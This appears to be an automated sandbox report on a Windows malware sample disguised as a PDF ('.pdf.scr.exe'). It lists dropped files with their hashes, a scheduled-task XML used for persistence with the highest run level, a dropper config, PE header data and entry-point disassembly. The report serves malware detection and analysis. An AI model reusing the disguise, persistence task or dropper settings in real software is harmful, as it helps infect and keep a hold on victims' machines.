              SHA1:DF2C2FAA8BB5C3D9B14D9A8CDBBF7E86F4F5034A
              SHA-256:E65F26F6FDABF467EE52D7466856CC152B9ECC355596FEBB34E5910413A2CD6D
              SHA-512:4714A1F10420EA1BED67ABA05B4D1E45D48D2BC2944CCCA93F1CB5F7B32F23147D869B6865E4B0A5D703D1F886C650907A4633EBDE9455A84BCC8065DEA18C77
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):632
              Entropy (8bit):6.226044296719832
              Encrypted:false
              SSDEEP:
              MD5:32C554BAC7052BFF5BBB4E69058154E4
              SHA1:A46476E21653B14423F462D7C3CF6EC16199A204
              SHA-256:B4BFAAF128F118F5B45AAEDC20246B3517926363C75DA64EBEF63D648FCBAC08
              SHA-512:D74B0DEDAC5A006E06CE5A9D7F91C1AC4FE5E4D355EC7A9F8F8683CDB83D4E584A47937D8B3C58198FC85A4C2F14261953B527E79204A53E64C3F6B9B3FB51BD
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):535
              Entropy (8bit):6.223028920694769
              Encrypted:false
              SSDEEP:
              MD5:C32315E0688E0A5633A0D2DCE4CC9629
              SHA1:F581EE1E102167C604CF366415105BB9314CF4B5
              SHA-256:E92602D9F89967C956CA83477F419BF1F5F917D95E3C0501BD6EA1BF76E85808
              SHA-512:F5FFC31716F87A024883845607BE750FF782F114C3EC76378F6A78255857A47C9929EBDDBC9325CBE1D35887FAED615F1874320326C40215EFBE2A99193E2BF4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):656
              Entropy (8bit):6.264380029804187
              Encrypted:false
              SSDEEP:
              MD5:194DE31777DD53F9E29A06776AE6C1B3
              SHA1:A4FF9EF9C4962628810B38368D4EFB13F53449D7
              SHA-256:90EA34BF2E24E4AD5DF9FD37CEA36ABB7784931028F401F98A2E6C2A10B5583E
              SHA-512:637EAED24EB4EF8A4EE96BFAF11524901799DC8FBFD2DFDB3B478521B99BE49D056A9745388AC29A70A54390A449FC493B6F9CA5E00095DBDB192FA236B1C9B1
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):584
              Entropy (8bit):6.2507180834396046
              Encrypted:false
              SSDEEP:
              MD5:F87E4604F5916FF6A25186B0B504E681
              SHA1:DB2989E8ED40A5CEED078473341C5D8B8FE4E0F7
              SHA-256:0A8B1D99032C6B90054E5ADF89EFA61D005B0F3E12DA48905051067ED906D529
              SHA-512:9CDD4285C8B9CF1C90BD9A73071C839D933EE44149E8CE689AA1ADE39056EAFD9CBBF348AC8BD5340A2DF7E8D91AE0529E872C377FA90DE46FB698395A8D9152
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):733
              Entropy (8bit):6.231676397919319
              Encrypted:false
              SSDEEP:
              MD5:DD66397E376C91D7F01F231D944C8DF1
              SHA1:8C2F651AF93B763090395AED51C2E551942DFEC3
              SHA-256:FF281486360AD0A5E071BFAE276626E80D212EA65AFBD3CA7784B0F4B3570D09
              SHA-512:7E81472C48AF0D9712068FB66500253F673629A313AF680071E8C8C961CB27D589F249AD688292259E384E4BCFC48161E901C6CB27659E16B42242C1E1CF2238
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.220144182081156
              Encrypted:false
              SSDEEP:
              MD5:7FFF06723AFA9FC84547B1E2D379AABD
              SHA1:4929D1A9298E365087EFDD2B019C05F6CF750E70
              SHA-256:B26D7992C99861FEE8E8E86614AF8A0B145AE8F2AEA197CE6BA8408EF07B9698
              SHA-512:538759223E6C9DEFE1F50B1AFF4C44CDDAF21C0712C51271E44431683C6E7F632F57800909CB48B7A0C26A02DDE11549FD996DFEDE8B50C97731CCB77B24EA3B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):581
              Entropy (8bit):6.223635486991566
              Encrypted:false
              SSDEEP:
              MD5:B74B8AC3F96B39CC953D1BA34CB751DD
              SHA1:48050CB8EA9C5A3B5108706C987799673A1454FC
              SHA-256:A3FB7C9084245E0939340B7ABBFA54C7AE7367CCF3D5E134EAA847E1EA453AEC
              SHA-512:A7F912456131E21627C14DADD6DF84AA9642006191D60A7E0B486B3850B8B0B63F87C559C5257344C98917501289782DFFC9347670B265C908CFDAEB0CDCCAE4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):501
              Entropy (8bit):6.190656898709683
              Encrypted:false
              SSDEEP:
              MD5:4171BED3F16A92882815F61417AB975A
              SHA1:97A4483C79036BE8148C6169C7CCFF080742F40C
              SHA-256:E5F2CF9586AA8F0634FEE2474D46BCF6030846F0B4A02FED80F65700FCA8F0F8
              SHA-512:59566FBFDF44FE734293BF1E1DC1FAC5A63D4458E858EA05B602F56613257F99DEEBB4C7D961169A01C774DAC87A1BA35C020B7FB9FF327970E60973661A109C
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):514
              Entropy (8bit):6.214291435583763
              Encrypted:false
              SSDEEP:
              MD5:55F643ECFE99B550B4823D0DB2E473C1
              SHA1:1DE1E7E890127FBCE7DCC4283B1F0ED2073071B8
              SHA-256:3283E76A48819F103CA6F2E58AB9911EF46DA4A6438E9CD37FD0628E0F664E17
              SHA-512:02B7C643A796B8B88CA0E3EE20024E15F13E0BB25B1A08F331408D0405EE39A478728365D61FC722356F73058050FD2230C28600076A8DCFCADEAC9BE1066863
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.170181324269657
              Encrypted:false
              SSDEEP:
              MD5:42788E9A82626033D1C890FEC1616027
              SHA1:4BC3D32071130B8830BA6999CAB6E836AFA741A6
              SHA-256:60B95B214023625539B917062F51833E9923711321185E7702ECCF0F9E16B256
              SHA-512:0334DB3EDE8EA3CB5107527EE5F162EFA37CE7C4CDBB168361614A6300443C0BDCF03590340C0E985882DA20C66717CC585F8621758AA81A9953BA04BA7ACCFB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):583
              Entropy (8bit):6.261328591888464
              Encrypted:false
              SSDEEP:
              MD5:E5450ED1310BAA27DF96331533B7116A
              SHA1:8F6F7C76A308B213EF39DE070CD3DF23B90EC209
              SHA-256:B5A1C32F1B74BD9BC40CB515B88DD0B1C0FB449DABC9E93AC75C581F111EEFB3
              SHA-512:519BE0EAFDBCD915E4C404F11DA4A713364BDF2EB4A2ADAD0E0CC16E3B0AA634C5AD0A5F498CCE8E3193365BDE1635154F054B4D54E4BF47EA6ACBA6F041A459
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):753
              Entropy (8bit):6.265094025870397
              Encrypted:false
              SSDEEP:
              MD5:61F20CA5A3C48D6323D19BEB700DE2F4
              SHA1:FEC46018E797396868619396016CC00F3E9F0D7D
              SHA-256:8637DDC34CC6276D56738F219D8AD4EB4BBF73D80CEE16AA0C686B96E49031A2
              SHA-512:AD6CABC216D4F5212FC3AA7EDAD6289E6CBE4C6E7336E804083D0E8AB390F6554E088B735761A6F3E1D7D9F93737EA0D2E32FB02B7ECD787EF6F5BDC4984044A
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.201022804655084
              Encrypted:false
              SSDEEP:
              MD5:3D1A20AE25ACA76918F525813753BB90
              SHA1:40EF954835A5E919E13155803E422FCB59A4D6E7
              SHA-256:72B7AA6124893C2A087D1691D2C7AD052903E028BEE451F5350C7BFFA2C50AD5
              SHA-512:706116CECE24D60C06B4691FF94B01BB7811165D6003CD7829CD32C9F791DEB2FC30753E9FEE794A1947CB422BCA69E7A5E6C90C8BCC07FA7598C579D185ADD3
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):510
              Entropy (8bit):6.227023728555456
              Encrypted:false
              SSDEEP:
              MD5:BF8C92BF8491E4783B72B4CCDA5E91BB
              SHA1:7D3E0FE500A79523FCB5C9E636E3B399C0FD8CA9
              SHA-256:B7FDCD17F59F82AD25996F0D1DB018624A51022D94780493A4AB98047C2EA7A3
              SHA-512:42092933F616ED495EE9D2DB9C5C40C34DA55DFE9E9A74A832DED06106EE0BF142AE220780BE2E820C97878A6B88BAFF450B66C89966D02F73F659974BD7A3BF
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):34981
              Entropy (8bit):5.585572477462829
              Encrypted:false
              SSDEEP:
              MD5:923021E60F76E22DF3997015A75D2DE2
              SHA1:0BF1F4312CB742E0FD3AA4797CD68839DD50EB86
              SHA-256:AC7EB1744189B9B145C3056E7847B5C17F27ED32BB66E05C5B7AE5CA024866B3
              SHA-512:C9E2B8BD11CF6DC78AF257148ABF0E0126FFE55130E6A80F63DEB33FA320B7048C6AFADDFEB692BD5D747D47D0EAD7EB45B203E62BB4F085567AB7E3E503200B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.245277588351939
              Encrypted:false
              SSDEEP:
              MD5:6A372892797F0436A2022B5C0D051DDF
              SHA1:D2138DA84C4D4469393DAF6B309C699D3776835B
              SHA-256:7E732B89FD4BA6996C2FEFB7DB6DA5BDE6B85E6BC44F7EA21DAA62992AE6A61A
              SHA-512:F25D9D07788FCB898C9174F06CFD76FC86F5CDD1202463BFA431CD7DCF72BD4B3616D3EF6F1B373898E551B515771F2A8DF8ED7E199982B0BC89AB06C0C40151
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):704
              Entropy (8bit):6.242209133425222
              Encrypted:false
              SSDEEP:
              MD5:30766DEDBDECAFF845571EEA5F3B21E4
              SHA1:514644B945925EEEE525AF9A8737277954B89288
              SHA-256:084034C5553C3DC615FA87DD84E10679480C16460B6A7F2EF3C5D8B0943683DD
              SHA-512:9CA41F1331CDBDE97DFFE697D3500117AB4DB8D19A12A900910CF8AF0526CEF5311295E10B3464FAA1451B3F6C8E445B8C48360FDDF239DAEF5E4651B76D6E60
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:modified
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1311
              Entropy (8bit):5.120237537969728
              Encrypted:false
              SSDEEP:
              MD5:9CC9B31561289BF47DDBEF114BE4B6FA
              SHA1:C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
              SHA-256:984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
              SHA-512:075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
              Malicious:true
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:51BBBB873C030E460FAD17FEDABBC3AB
              SHA1:5CC4E4B44A56143A4634286AA9E05F8607426C06
              SHA-256:AF3FBBF96097D55438E4F0F623AB560923B3E01927AC132EEA4D194DF8D96F42
              SHA-512:FAB50F156C07AF56AD56024C5E3E9443F1E31A524EAE3EA50BA699AC7CDEF7EE8BA65219E2A10F24F42D025C1080787F847CDE081FD21D10649D86B89516AB8B
              Malicious:true
              Reputation:unknown
              Preview:Y.;hR..H
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):48
              Entropy (8bit):4.556127542695029
              Encrypted:false
              SSDEEP:
              MD5:71C86F4534ED6EA4C1E9A785F2EB0A92
              SHA1:D065F0540580FC2E0ACD365784FD5A60F8235829
              SHA-256:DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
              SHA-512:6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
              Malicious:false
              Reputation:unknown
              Preview:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):91
              Entropy (8bit):5.006199003780079
              Encrypted:false
              SSDEEP:
              MD5:AEF559A1D83E37D78B012A94CCE85889
              SHA1:44228F31FBDA6D787CD91E082E8EF769A23B37AA
              SHA-256:637F2CAB19C58F9E961062E379089A4DCDDCA806EA439BC8C0E63285DEC9F294
              SHA-512:235B7E78EBFFC6640E9476A85C3FD528A4C420F62DCA2AD7FA8C8105669B3278DEDBD50E51B73A7344775C7B9C076594DFDC91FD3857875278066039B91D9A9C
              Malicious:false
              Reputation:unknown
              Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder10_51..ExE_c=ihgsvw.exe..
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1141
              Entropy (8bit):4.44831826838854
              Encrypted:false
              SSDEEP:
              MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
              SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
              SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
              SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
              Malicious:false
              Reputation:unknown
              Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.853911292117169
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:004349256789197.pdf.scr.exe
              File size:1181640
              MD5:3ac05bbe35293fbfd0df49ecfb34c461
              SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
              SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
              SHA512:21f616118075066eda343383aad8d6f2dd71bc33c9b8efec3eedc891414d96a0602449abddb96513d55da97ddedb987d612d8227dfd8f64ca85ed2051eb02e14
              SSDEEP:24576:9TbBv5rUeTM/TYaxVKPijgGjFwJ5gRn0Bz76hZYBA3pUd26P207:XBvsHB7jQ5Cnq7+ZEA3pEt+0
              TLSH:AD451202BBC695B3D5A3193256753B11BA3CB9601FA58ECFA7E00A5CDA315C0DB317B2
              Icon Hash:938c8c90b2ea6ab2
              Entrypoint:0x41f530
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:12e12319f1029ec4f8fcbed7e82df162
              Instruction
              call 00007F216C70BF2Bh
              jmp 00007F216C70B83Dh
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F216C6FE687h
              mov dword ptr [esi], 004356D0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 004356D8h
              mov dword ptr [ecx], 004356D0h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 004356B8h
              push eax
              call 00007F216C70ECCFh
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F216C70B9CCh
              push 0000000Ch
              push esi
              call 00007F216C70AF89h
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C6FE602h
              push 0043BEF0h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E789h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C70B948h
              push 0043C0F4h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E76Ch
              int3
              jmp 00007F216C710207h
              int3
              int3
              int3
              int3
              push 00422900h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              Name                                  Virtual Address  Virtual Size  Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT          0x3d070          0x34          .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT          0x3d0a4          0x50          .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x64000          0x4a8c        .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x69000          0x233c        .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG           0x3b11c          0x54          .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x355f8          0x40          .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x278         .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3c5ec          0x120         .rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
              .text   0x1000           0x31bdc       0x31c00   False     0.5909380888819096  data       6.712962136932442   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata  0x33000          0xaec0        0xb000    False     0.4579190340909091  data       5.261605615899847   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data   0x3e000          0x24720       0x1000    False     0.451416015625      data       4.387459135575936   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat  0x63000          0x190         0x200     False     0.4453125           data       3.3327310103022305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc   0x64000          0x4a8c        0x4c00    False     0.6105571546052632  data       6.391160230365552   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc  0x69000          0x233c        0x2400    False     0.7749565972222222  data       6.623012966548067   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name           RVA      Size    Type                                                            Language  Country
              PNG            0x64524  0xb45   PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced       English   United States
              PNG            0x6506c  0x15a9  PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced      English   United States
              RT_ICON        0x66618  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 192
              RT_DIALOG      0x66740  0x286   data                                                            English   United States
              RT_DIALOG      0x669c8  0x13a   data                                                            English   United States
              RT_DIALOG      0x66b04  0xec    data                                                            English   United States
              RT_DIALOG      0x66bf0  0x12e   data                                                            English   United States
              RT_DIALOG      0x66d20  0x338   data                                                            English   United States
              RT_DIALOG      0x67058  0x252   data                                                            English   United States
              RT_STRING      0x672ac  0x1e2   data                                                            English   United States
              RT_STRING      0x67490  0x1cc   data                                                            English   United States
              RT_STRING      0x6765c  0x1b8   data                                                            English   United States
              RT_STRING      0x67814  0x146   data                                                            English   United States
              RT_STRING      0x6795c  0x46c   data                                                            English   United States
              RT_STRING      0x67dc8  0x166   data                                                            English   United States
              RT_STRING      0x67f30  0x152   data                                                            English   United States
              RT_STRING      0x68084  0x10a   data                                                            English   United States
              RT_STRING      0x68190  0xbc    data                                                            English   United States
              RT_STRING      0x6824c  0xd6    data                                                            English   United States
              RT_GROUP_ICON  0x68324  0x14    data
              RT_MANIFEST    0x68338  0x753   XML 1.0 document, ASCII text, with CRLF line terminators        English   United States
              DLL | Import
              KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, 